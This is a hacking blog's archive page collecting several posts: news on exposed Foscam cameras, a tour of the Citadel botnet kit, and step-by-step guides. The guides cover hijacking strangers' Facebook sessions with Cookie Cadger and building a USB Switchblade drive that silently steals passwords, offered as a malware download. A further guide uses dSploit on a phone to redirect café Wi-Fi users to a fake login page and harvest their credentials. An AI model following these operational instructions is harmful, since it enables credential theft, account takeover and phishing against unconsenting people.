Category Archives: security

Many Internet Connected Security Cameras are Open to Remote Exploit

Thousands of wireless IP cameras connected to the Internet have serious security weaknesses that allow attackers to hijack them and alter their firmware, according to two researchers from security firm Qualys.

The cameras are sold under the Foscam brand in the U.S., but the same devices can be found in Europe and elsewhere with different branding, said Qualys researchers Sergey Shekyan and Artem Harutyunyan, who analyzed the security of the devices and are scheduled to present their findings at the Hack in the Box security conference in Amsterdam on Thursday.

Tutorials provided by the camera vendor contain instructions on how to make the devices accessible from the Internet by setting up port-forwarding rules in routers. Because of this, many such devices are exposed to the Internet and can be attacked remotely, the researchers said.

Finding the cameras is easy and can be done in several ways. One method involves using the Shodan search engine to search for an HTTP header specific to the Web-based user interfaces of the cameras. Such a query will return more than 100,000 devices, the researchers said.

The vendors selling these cameras also have them configured to use their own dynamic DNS services. For example, Foscam cameras get assigned a hostname of the type [two letters and four digits].myfoscam.org. By scanning the entire *.myfoscam.org name space an attacker could identify most Foscam cameras connected to the Internet, the researchers said.

Around two out of every 10 cameras allow users to log in with the default “admin” user name and no password, the researchers said. For the rest that do have user-configured passwords, there are other ways to break in.

One method is to exploit a recently discovered vulnerability in the camera’s Web interface that allows remote attackers to obtain a snapshot of the device’s memory.

This memory dump will contain the administrator user name and password in clear text along with other sensitive information like Wi-Fi credentials or details about devices on the local network, the researchers said.

Even though the vendor has patched this vulnerability in the latest firmware, 99% of Foscam cameras on the Internet are still running older firmware versions and are vulnerable, they said. There is also a way to exploit this vulnerability even with the latest firmware installed if you have operator-level credentials for the camera.

Another method is to exploit a cross-site request forgery (CSRF) flaw in the interface by tricking the camera administrator to open a specifically crafted link. This can be used to add a secondary administrator account to the camera.

Citadel: The Thoroughbred of Cyber Crime

In old times, a citadel was a fortress used as the last line of defense. For cyber criminals it is a powerful and state-of-the-art toolkit to both distribute malware and manage infected computers (bots). Citadel is an offspring of the (too) popular Zeus crimekit whose main goal is to steal banking credentials by capturing keystrokes and taking screenshots/videos of victims’ computers. Citadel came out circa January 2012 in the online forums and quickly became a popular choice for criminals. A version of Citadel (1.3.4.5) was leaked in late October and although it is not the latest (1.3.5.1), it gives us a good insight into what tools the bad guys are using to make money.

In this post, I will show you how criminals operate a botnet. This is not meant as a tutorial and I do want to stress that running a botnet is illegal and could send you to jail.

A nice home

In order to get into business the bad guys need a server that is hosted at a company that will turn a blind eye on their activities and also guarantee them some anonymity. Such companies are called Bulletproof hosting and can be found in most underground forums.

Those hosting firms are for the most part located in countries like China or Russia and therefore in their own jurisdiction where so long as you don’t commit crimes against your own people not a whole lot can happen to you. To cover their tracks even more, the bad guys use proxy or VPN services that disguise their own IP address.

A shiny new toy

Once set up with a server, it is time to install what will be the mastermind program to create and organize an entire array (botnet) of infected computers worldwide. A variety of crimekits exist but in this post we will concentrate on Citadel.

Once again, the core installation files can be found in the underground community or through your own connections. Recently, the Citadel kit was withdrawn from forums to prevent too much exposure and attention. It costs around $3000 USD.

To install Citadel, you simply browse to the install folder with your browser and set up the main access username and password as well as database information.

In this testing, the installer did not automatically create the database but you can do so by hand. To finally access the login page, you need to browse to the cp.php file:

 Before logging in, I want to show you the other component that makes this package complete. It is called the builder and is essentially used to create the piece of malware that criminals will distribute (forced installs through infected websites) and that links to their crimekit.

Stolen credentials are harvested by various means:

  • Keystroke logging
  • Screenshot capture
  • Video capture

A powerful feature used to trick users into revealing confidential information is dubbed WebInject. It is powerful because it happens in real time and is completely seamless. A WebInject is a piece of code that contains HTML and JavaScript which creates a fake pop-up that asks the victim for personal information within the context of logging into a site. The bad guys can trigger it in two ways: either automatically when a site of interest is opened by the victim, or manually on the fly.

It is the ultimate phishing tool because it does not go against any known proper precautions a user would normally take. For instance, the site’s URL is unchanged and shows the secure pad lock with the financial institution’s SSL certificate. This type of hack is also called a man-in-the-middle attack. Many times this kind of attack doesn’t work as users get suspicious. Ransom-ware works much better in my opinion.

Since a lot of people download music and movies from torrents or other shady sites, the message tricks them into thinking they have been caught by the local authorities. It’s a very smart scare tactic which works quite well, unfortunately. To add to the drama, the malware will attempt to turn on the user’s webcam as if they were already under surveillance.

The FBI has posted an article regarding this scam (http://www.fbi.gov/news/stories/2012/august/new-internet-scam) and urges people to not pay any money as it could get you into even more troubles.

Malwarebytes users are protected against the FBI Moneypak malware. If you aren’t one of them and are already infected you can remove this ransomware by following these 3 steps:

  1. Reboot your computer into Safe Mode with Networking. (Instructions from Microsoft here)
  2. Download Malwarebytes Anti-Malware.
  3. Run Malwarebytes Anti-Malware and remove all malware

What’s next for Citadel?

The latest version (1.3.5.1) whose code name is Rain Edition is getting pricey at $3931 but it includes a lot of valuable features (advanced support for Chrome and Firefox, improved WebInjects, smarter ‘on-the-fly’ updates to the Trojan, etc…).

The makers of Citadel are trying to keep a low enough profile to avoid gathering too much attention which could result in efforts to go after them (as we have seen with Zeus). Getting your hands on Citadel is more difficult because of a stricter validation process within the Russian underground.

How to protect yourself

When seeing such technically advanced crimekits it puts a lot of things into perspective. The methods used to steal personal information are so advanced and sneaky that even the most cautious user may get fooled. It is best to avoid infection in the first place by using a solution such as Malwarebytes Anti-Malware PRO that constantly protects your computer by blocking malicious sites and files. Using a combination of both safe online practices (if you ever feel uncomfortable disclosing personal information, give your bank a call or ask a friend) and a good anti malware solution will keep you safe(r).

A Study On Russian Cyber Crime

As we all know a lot of the crime that happens on the internet originates in Russia. Mostly because of Russia’s rather relaxed approach to enforcing any laws on internet interactions. With the relative lack of control over what goes on on the internet in Russia, a large underground network for cyber criminals has developed. They sell some perfectly normally things VPN’s, bullet proof VPS’s as well as dedicated servers. But what is also on the market are things like Botnets, DDOS attacks, root kits and some other pretty sketchy stuff.

Reading about it is rather interesting you begin to see how you could relativity cheaply DDOS anyone you want or even have custom made rootkits made specially for you. It kind of scares me that if I was to make someone mad how easy it would be for them to screw up my life. As long as they know where to look.

If you interested in learning more about how this Russian cyber crime works, Trend Micro has a great white paper on the subject. if you don’t want to find it on the site you can just download it.

Using Cookie Cadger for Live Packet Capture

I’m very sorry I wasn’t able to get to this sooner, I know I said I would write one. But now I’m home and I’m going to write a guide to capturing you first cookies with Cookie Cadger. If you haven’t already downloaded Cookie Cadger do so now. Cookie cadger is a Java package so you will also need to have Java 7 downloaded as well a a Wireshark Package called tshark. If you have Wireshark installed tshark should be installed also. But if it isn’t, download it from what ever package manager you use.

The next step before you open up Cadger is to set your card into monitor mode. I wrote a guide that should work for almost every wireless card on the market. But if my guide doesn’t work a little bit of Googling around should find a guide that will work for your card. Once you set your card into monitor mode you need to open the CookieCadger.jar package. Note: Some users have reported issues with Cadger not recognizing capture devices. This problem can be solved by running Cadger as root.

Once you open up Cadger and you will first be presented with a little bit of text. It is asking you if you want it to automatically begin capturing traffic when the real program starts up. It also informs you about the legality of what you are about to do. I believe that in the United States at least it is legal to capture insecure traffic. Correct me if I’m wrong. Anyways click yes.

Once you click Yes another screen will load up. The first thing you want to select is the interface you want to capture cookies on. Cadger will list what ever interface you have set into monitor mode. If you set eth0 chose eth0 if you set wlan0 chose wlan0.

If you selected the correct interface, for example eth0 you should start seeing a bunch of insecure cookies as long as you are on a network with people using the internet. Click on the tab recognized sessions, find a cookie that you like, Facebook is a good one to start with. Open the cookie in your browser.

The cookie will load up and you will have access to the persons Facebook! There is definitely a lot more potential behind Cookie Cadger than just breaking into peoples Facebook’s. Play around with Cadger a bit and you’ll find it’s a really great tool. Use your new found powers wisely.

Note: Using Cadger is exactly the same on any OS. Command line mode may differ. The only difference is how you get your card into monitor mode. We have a guide for Linux and a guide for Mac. A guide for Windows is in the works.

If you have any questions or something I need to add tell me in the comments.

Cookie Cadger Is Free! But How Do I Use It?

Cookie Cadger is now free but I’ve had some people asking how you set your card into monitor mode a requirement for Cookie Cadger. Before you set into monitor mode download Cookie Cadger you will need Java 7 installed as well as a package called tshark, normally part of the wireshark package though I had to install it from my package manager. I know you asked for a guide to use Cookie Cadger I hope you can get by with just a guide to monitor mode until I get home. You can now use the guide Cadger for basic capture. Also for Mac users I’ve written a guide for setting your card into monitor mode the usage of Cookie Cadger is exactly the same on any OS.

First step to begin hacking the WEP networks is to put your wireless network card into monitor mode. For this we will use ifconfig and iwconfig. These instructions may not work for your card. I will explain how to set it up with atheros chipset cards in a separate post. This is for Broadcoms or RT2500 and most other stock cards.

Step 1: Open a shell
Now we want to see what the cards installed on our computer are known as.

Step 2: At the prompt type iwconfig
You will see something like this:

lo no wireless extensions

eth0 IEEE 802.11b/g ESSID:Off/any Nickname: "Broadcom 4311"

Mode: Managed Frequency=2.437 GHz...

Disregard the ‘lo’ card. Your card is the one or more other cards listed. In my case the card is known as ‘eth0’ yours also could be know as ‘wlan0’. As we can also see in the second line, the card is currently in managed mode, we must get it into monitor mode.

We also need our card to be “UP”. To check the up and down status, we use:

ifconfig

The results should show your card and the second line of the cards information should start with ‘UP’. If your card is not shown or if it is not showing it with the word ‘UP’, then we must put it up. If you’re not sure, you can also put it up and there will be no harm done. Here’s how we do it.

ifconfig eth0 up

Now type ifconfig again and you should see your card and marked as up.

 iwconfig eth0 mode monitor

In case you couldn’t tell, this places the card into monitor mode. Doing iwconfig again should now show mode as monitor.

If you followed these steps correctly you should be able to start up Cookie Cadger, Aircrack or any thing else that requires monitor mode and it should work exactly how you want it to. I’m writing this from my phone but I’ll be post some screen shots later on. If you have any questions ask them in the comments.

USB Drives for Penetration Testing

USB Penetration Testing

USB ports are some of the most vulnerable parts of a computer, they exist on desktops, laptops, and servers. Most time they are fully accessible if you have physical access to a machine. Personally getting access to a USB port on a server or even a desktop linked to the target network is a very high priority when I’m pen testing any company. Many times you only need access to a USB port once to gather enough information to compromise a organization.

USB Switcblade / Hacksaw

USB Switchblade is the product of Hak5 and the surrounding community way back in 2006. It has the ability to capture and record information about the computer it is used on, but can also take password hashes, IP information, auto-fill information and some versions of Switchblade can create backdoors in the system for access at a later date.

In order to do this Switchblade uses a U3 drives ability to create a virtual CD-ROM drive allowing autorun to function. It can capture and record password hashes for later cracking. Switchblade can also take browser history (not Chrome history!) and any autofill information on the system. As well product keys for any installed Windows products. Some versions can also create a ghost administrator account for later access. The biggest advantage of using Switchblade is that all this can be done hands free within a few seconds.

USB Rubber Ducky

USB Rubber Ducky is the next generation of Switchblade. It has it’s own code called duckycode for writing plugins for it. You can buy it pre-installed for 59 $. But the source code is also open. I’ll be posting later about how to install it on a 3rd party device. The post is now here. For now though you can check it out on Hak5’s store. Or you can download the source code from github.

USB Keyloggers

I recently wrote an article about USB keyloggers and how a top executive had found a suspicious USB device inserted in between his keyboard and his computer. It turned out that the device was a physical keylogger, and unless you are doing physical inspections of hardware they are nearly undetectable. Of course these types of loggers require that you have access to the target machine on a regular basis to make them useful. They are also rather pricey. But can really change the tide of a pen testing attack.

The Best Option

I use USB Hacksaw/ Switchblade depending on the kind of attack I am preforming. It is by far the cheapest option and can give you tons of very valuable intel as well as a discreetly installed backdoor with Switchblade.

Setting Up USB Switchblade

Picking a USB drive

I will be setting switch blade up on a U3 drive because they have the ability to emulate a CD drive and automatically executed the Switchblade payload without any interaction other than plugging it in. Potentially allowing you to attack a locked computer.

These are the drives I will use to setup on. Two very unassuming drives that will draw little attention plugged into a target machine. But also with enough space to take a lot of information from several different computers.

Installing on the Drive

I’ve put together a package of all the required information for you to download. Switchblade is no longer being maintained and is very difficult to find on the internet. Before you start download that package at the bottom of the page.

Once you download it unzip it all follow the instructions exactly.

1. Unzip the NarwhaleUSB package you downloaded.

2.  Open the Switchblade folder.

3. Unzip the Universal Customizer to “C:\Universal_Customizer

4. Unzip the -=GonZor=- Payload V2.1 to “C:\Payload

5. Copy the file U3CUSTOM.ISO from C:\Payload to C:\Universal_Customizer\BIN replacing the old one.

6. Run C:\Universal_Customizer\Universal_Customizer.exe and plug in U3 smart drive.
– Select Accept and click Next.
– Close all U3 applications and any applications that access your U3 drive and click Next.
– Set a password for the backup zip file (Empty password not allowed)
– Click Next and it will start backing up data. Wait for the Universal Customizer to modify your CD partition and replace your files to the flash drive.
– The modification should now be complete, Unplug your U3 Drive and plug it back in

7. Copy “C:\Payload\SBConfig.exe” to the mass storage of the flash drive

8. Run SBConfig.exe from flash drive

– Select the check boxes of the Payload options you would like to use
– Enter your email address and password for the HackSaw if you wish to use it.
– Click “Update Config” button, a message box should appear to confirm this is completed
– Toggle between using the payload or not by clicking the “Turn PL On”/”Turn PL Off” button
– Toggle between using the U3 Launcher or not by clicking the “Turn U3 Launchpad On”/”Turn U3 Launchpad Off” button

9. You now have -=GonZor=- Payload V2.1 in your U3 smart drive which can automatically steal password once it is plugged in to a computer with administrative privileges.

I’ve tested it and it’s very scary because when I plugged in the hacked U3 smart drive with USB Switchblade payload, the payload ran silently and invisibly! It did not modify any system settings nor sent any network traffic. There is a log file created at F:\System\Logs\COMPUTERNAME (F: drive is the storage drive) by the payload and I am shocked to see that my network configurations, router password, Windows Live Messenger password, Google Talk password, Gmail password, all Firefox passwords, Internet Explorer passwords, ICQ password, Windows Product Keys and etc being recorded in that log file!

As you can see from this guide USB drives can be very dangerous when network security is involved. I recommend securing all servers inside locked racks and regularly inspecting workstations as well as private and company laptops. Basically any computer that may connect to the network you are attempting to secure. Have any tips for securing USB ports or any tool you use for making your drives dangerous? Tell us in the comments.

Downloads

NarwhalUSB Package – When you download it will show up as a virus. Because thats what it is.

Phishing Using Only a Android Phone

Recently evilsocket released a Android app called dSploit, it’s basically a stripped down version of Metasploit for Android. You can preform Man in The Middle attacks and also scan for vulnerable operating systems. But one of the MITM attacks that I think could be the best, is the ability to redirect all traffic on a network to a web page. For example you could go to a coffee shop having before hand written up a legitimate looking sign in page for the target shop or public wifi network.
You join just like any other patron open up dSploit and redirct all traffic to a fake login page being served off you phone. Rather than just having guest sign in you could also have them register to pay to get access to the wifi, they are unsuspectingly handing you their credit card numbers or logins to any site you chose. All you need is a Android cell phone or tablet and a few minutes to set the server up.

  • I will be using kWS for serving my fake login pages. You can download it form the Android store.
  • You will need to download dSploit for the developers web page I posted earlier about installing and using dSploit.

First you need to decide where you HTML page will be stored. Mine is going in /mnt/sdcard/publichtml you can put yours anywhere.

Once you decide what directory to put your HTML in click on Port and enter a port number I decided to go with 8888. Because it is not normally blacklisted on any public networks.

After you finish setting up the directories and port go ahead and place what ever HTML you want into the selected /publichtml folder. Once you do that open up kWS and click on run server.

Hopefully you get a return from the server that looks exactly like this one. Take note of you local IP address. If you don’t there’s something wrong with your setup. Go back and make sure that the server is looking for the html in the right place. If that doesn’t change anything try again with a different port. Once you get it running correctly, all you need to do is open up dSploit and it will scan the network you are attached to. Select 192.168.1.0/24 then select MITM and finally Redirect. Fill out the menu with your phones local IP address that you found when you started the web server and what ever port the server is using.

Finally click Ok and it will begin redirecting all HTTP traffic to your fake web page. The few times I’ve used this I simply redirected people to a fake Facebook login where I saved the email and password to a text file. But this could be used for a much more malicious purpose. If you have any problems or suggestions tell me in the comments and I’ll try to work them out for you.